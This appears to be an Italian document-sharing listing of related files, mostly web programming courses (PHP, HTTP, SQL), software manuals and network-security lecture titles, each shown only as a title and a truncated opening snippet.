Dettagli

Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo

Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo Roberto Obialero, GCFW, GCFA Fabio Bucciarelli, GCFA, CEH Agenda Analisi del contesto (attacchi,

Dettagli

Tecnologie e Programmazione Web

Tecnologie e Programmazione Web Presentazione 1 Tecnologie e Programmazione Web Html, JavaScript e PHP RgLUG Ragusa Linux Users Group SOftware LIbero RAgusa http://www.solira.org - Nunzio Brugaletta (ennebi) - Reti 2 Scopi di una rete

Dettagli

Uso sicuro del web Navigare in siti sicuri

Uso sicuro del web Navigare in siti sicuri Uso sicuro del web Navigare in siti sicuri La rete internet, inizialmente, era concepita come strumento di ricerca di informazioni. L utente esercitava un ruolo passivo. Non interagiva con le pagine web

Dettagli

Servizi centralizzati v1.2 (20/12/05)

Servizi centralizzati v1.2 (20/12/05) Servizi centralizzati v1.2 (20/12/05) 1. Premessa Anche se il documento è strutturato come un ricettario, va tenuto presente che l argomento trattato, vista la sua variabilità, non è facilmente organizzabile

Dettagli

RELAZIONE SCRITTA RELATIVA AL PROGRAMMA DI GESTIONE TABELLA ATTORI

RELAZIONE SCRITTA RELATIVA AL PROGRAMMA DI GESTIONE TABELLA ATTORI Nicoletta Barbaro 4C Mercurio TRACCIA DEL PROBLEMA: RELAZIONE SCRITTA RELATIVA AL PROGRAMMA DI GESTIONE TABELLA ATTORI Un'azienda che distribuisce film in formato dvd chiede ad una software house(4c mercurio)

Dettagli

SMS-Bulk Gateway interfaccia HTTP

SMS-Bulk Gateway interfaccia HTTP SMS-Bulk Gateway interfaccia HTTP Versione 2.3.1 2001-2014 SmsItaly.Com 1 1 Introduzione 1.1 Sommario Solo gli utenti autorizzati hanno accesso al nostro SMS Gateway e possono trasmettere messaggi SMS

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Architetture Web parte 2

Architetture Web parte 2 Architetture Web parte 2 Programmazione in Ambienti Distribuiti A.A. 2004-05 Sessione Un insieme di richieste, provenienti dallo stesso browser e dirette allo stesso server, confinate in un dato lasso

Dettagli

Tecnologia avanzata e project engineering al servizio della PA Sicurezza delle reti della PA, dei servizi pubblici e delle attività digitali degli impiegati pubblici FORUM PA Digital Security per la PA

Dettagli

Istituto Tecnico Industriale Statale Dionigi Scano Cagliari. Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014.

Istituto Tecnico Industriale Statale Dionigi Scano Cagliari. Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014. Istituto Tecnico Industriale Statale Dionigi Scano Cagliari Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014 relate Un esperimento di social networking open source 1 Introduzione

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

Corso di PHP. Prerequisiti. 6.1 PHP e il web 1. Conoscenza HTML Tecnica della programmazione Principi di programmazione web

Corso di PHP. Prerequisiti. 6.1 PHP e il web 1. Conoscenza HTML Tecnica della programmazione Principi di programmazione web Corso di PHP 6.1 PHP e il web 1 1 Prerequisiti Conoscenza HTML Tecnica della programmazione Principi di programmazione web 2 1 Introduzione In questa Unità illustriamo alcuni strumenti di programmazione

Dettagli

1. ACCESSO AL PORTALE easytao

1. ACCESSO AL PORTALE easytao 1. ACCESSO AL PORTALE easytao Per accedere alla propria pagina personale e visualizzare la prescrizione terapeutica si deve possedere: - un collegamento ad internet - un browser (si consiglia l utilizzo

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

<Portale LAW- Lawful Activities Wind > Pag. 1/33 Manuale Utente ( WEB GUI LAW ) Tipo di distribuzione Golden Copy (Copia n. 1) Copia n. Rev. n. Oggetto della revisione Data Pag. 2/33 SOMMARIO 1. INTRODUZIONE...

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

Siti interattivi e dinamici. in poche pagine

Siti interattivi e dinamici. in poche pagine Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata

Dettagli

Vallarino Simone. Corso di sicurezza A.A. 2003/2004 HTTPS

Vallarino Simone. Corso di sicurezza A.A. 2003/2004 HTTPS Vallarino Simone Corso di sicurezza A.A. 2003/2004 HTTPS INTRODUZIONE Per cominciare a parlare di https è necessario aprire la discussione ricordando le caratteristiche dell http: HTTP Nel sistema telematico

Dettagli

PHP e Structured Query Language

PHP e Structured Query Language Esercitazioni del corso di Tecnologie per la Comunicazione Aziendale PHP e Structured Query Language Marco Loregian loregian@disco.unimib.it www.siti.disco.unimib.it/didattica/tca2008 Interrogazioni (ripasso)

Dettagli

Nozioni di base sull utilizzo di PHP e di MySQL

Nozioni di base sull utilizzo di PHP e di MySQL Nozioni di base sull utilizzo di PHP e di MySQL Che cos è PHP? Mi sento in dovere prima di iniziare ad illustrare le nozioni di base di PHP introdurre dicendo PHP che cos è in sostanza; fino a qualche

Dettagli

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Pag. 1/1 Sessione ordinaria 2010 Seconda prova scritta Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE CORSO DI ORDINAMENTO Indirizzo: INFORMATICA

Dettagli

Session tracking Session tracking HTTP: è stateless, cioè non permette di associare una sequenza di richieste ad un dato utente. Ciò vuol dire che, in generale, se un browser richiede una specifica pagina

Dettagli

Corso di Web Programming

Corso di Web Programming Corso di Web Programming 11. PHP - Complementi Paolo Milazzo Dipartimento di Informatica, Università di Pisa http://www.di.unipi.it/ milazzo milazzo di.unipi.it Corso di Laurea in Informatica Applicata

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif Web e HTTP Terminologia Una pagina web consiste di oggetti Un oggetto può essere un file HTML, una immagine JPG, ecc. Una pagina web consiste di un file HTML base che fa riferimento a diversi oggetti al

Dettagli

Sicurezza delle reti. Monga. L autenticazione in rete Password Altre credenziali OTP Metodi crittografici. Pericoli. Sicurezza delle reti.

Sicurezza delle reti. Monga. L autenticazione in rete Password Altre credenziali OTP Metodi crittografici. Pericoli. Sicurezza delle reti. 1 Mattia Lezione XIX: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo

Dettagli

manuale utente rev. 2.0 powered by

manuale utente rev. 2.0 powered by manuale utente rev. 2.0 powered by www.cantierecreativo.net MANUALE UTENTE REV.2 Indice generale 1 Introduzione... 2 2 Accesso all'area amministrativa...3 3 Sezione Pagine... 4 3.1 Pagine recenti...4 3.2

Dettagli

ASSOCIAZIONE ITALIANA EDITORI

ASSOCIAZIONE ITALIANA EDITORI ASSOCIAZIONE ITALIANA EDITORI APPLICAZIONE WEB CONSULTAZIONE CATALOGO LIBRI DI TESTO DESTINATO AI DOCENTI MANUALE UTENTE v. 1.0-08/04/2010 INDICE 1 INTRODUZIONE...3 2 RICHIESTA DI ABILITAZIONE ALL USO...3

Dettagli

PHP. Per poter interagire con i dati che si trovano sul server remoto occorrono strumenti server-side.

PHP. Per poter interagire con i dati che si trovano sul server remoto occorrono strumenti server-side. PHP Il linguaggio HTML e i linguaggi di scripting come Javascript impongono alcune limitazioni alle applicazioni che si possono realizzare : per esempio non è possibile costruire un sito Web che consenta

Dettagli

Nuvola It Data Space

Nuvola It Data Space MANUALE UTENTE INDICE 1. Descrizione servizio... 3 1.1. Informazioni sul servizio di Telecom Italia... 3 1.2. Ruoli e Autenticazione per il servizio di Telecom Italia... 3 1.3. Strumenti... 5 1.4. Documentazione...

Dettagli

CLAROLINE. Manuale d'uso. Area Docenti

CLAROLINE. Manuale d'uso. Area Docenti CLAROLINE Manuale d'uso Area Docenti ELEARNING SYSTEM 2 Introduzione Claroline è un sistema Web di gestione di percorsi formativi a distanza. Permette a docenti, relatori, ecc. di generare ed amministrare

Dettagli

PHP. A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas. Copyright Istituto Italiano Edizioni Atlas

PHP. A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas. Copyright Istituto Italiano Edizioni Atlas PHP A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas Copyright Istituto Italiano Edizioni Atlas Programmazione lato server PHP è un linguaggio che estende le funzionalità

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

FileMaker 12. Guida ODBC e JDBC

FileMaker 12. Guida ODBC e JDBC FileMaker 12 Guida ODBC e JDBC 2004 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker, Inc.

Dettagli

NETASQ V9: PKI & Controllo accessi. Presentation Marco Genovese Presales engineer marco.genovese@netasq.com

NETASQ V9: PKI & Controllo accessi. Presentation Marco Genovese Presales engineer marco.genovese@netasq.com NETASQ V9: PKI & Controllo accessi Presentation Marco Genovese Presales engineer marco.genovese@netasq.com Alcuni concetti Alcuni concetti prima di incominciare per chiarire cosa è una PKI e a cosa serve

Dettagli

Applicazione ASP di esempio

Applicazione ASP di esempio Applicazione ASP di esempio Database in rete Prof. Claudio Maccherani Un server web è un programma che gira su un computer sempre collegato ad Internet e che mette a disposizione file, pagine e servizi.

Dettagli

Reti di calcolatori. Lezione del 25 giugno 2004

Reti di calcolatori. Lezione del 25 giugno 2004 Reti di calcolatori Lezione del 25 giugno 2004 Tecniche di attacco Denial of Service : impedisce ad una organizzazione di usare i servizi della propria rete; sabotaggio elettronico Gli attacchi DoS possono

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Dato un form contenente

Dato un form contenente <input type=text name=weight size=20 /> Dato un form contenente Lo script PHP inserisce l input dell utente in una variabile speciale chiamata $_REQUEST['weight']il cui argomento è uguale al corrispondente

Dettagli

intranet solutions www.goinfoteam.it THE INTEGRATION OF INFORMATION, DESIGN AND TECHNOLOGY

intranet solutions www.goinfoteam.it THE INTEGRATION OF INFORMATION, DESIGN AND TECHNOLOGY solutions THE INTEGRATION OF INFORMATION, DESIGN AND TECHNOLOGY www.goinfoteam.it Lo scopo del progetto è quello di dotare l azienda di una piattaforma di collaborazione che sia flessibile e personalizzabile.

Dettagli

Single Sign On sul web

Single Sign On sul web Single Sign On sul web Abstract Un Sigle Sign On (SSO) è un sistema di autenticazione centralizzata che consente a un utente di fornire le proprie credenziali una sola volta e di accedere a molteplici

Dettagli

Programmazione Java Avanzata

Programmazione Java Avanzata Programmazione Java Avanzata Accesso ai Dati Ing. Giuseppe D'Aquì Testi Consigliati Eclipse In Action Core J2EE Patterns - DAO [http://java.sun.com/blueprints/corej2eepatterns/patterns/dataaccessobject.html]

Dettagli

FileMaker 12. Guida di Pubblicazione Web Immediata

FileMaker 12. Guida di Pubblicazione Web Immediata FileMaker 12 Guida di Pubblicazione Web Immediata 2004 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013 Sicurezza delle applicazioni web: attacchi web Srdjan Matic, Aristide Fattori 31 Maggio 2013

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli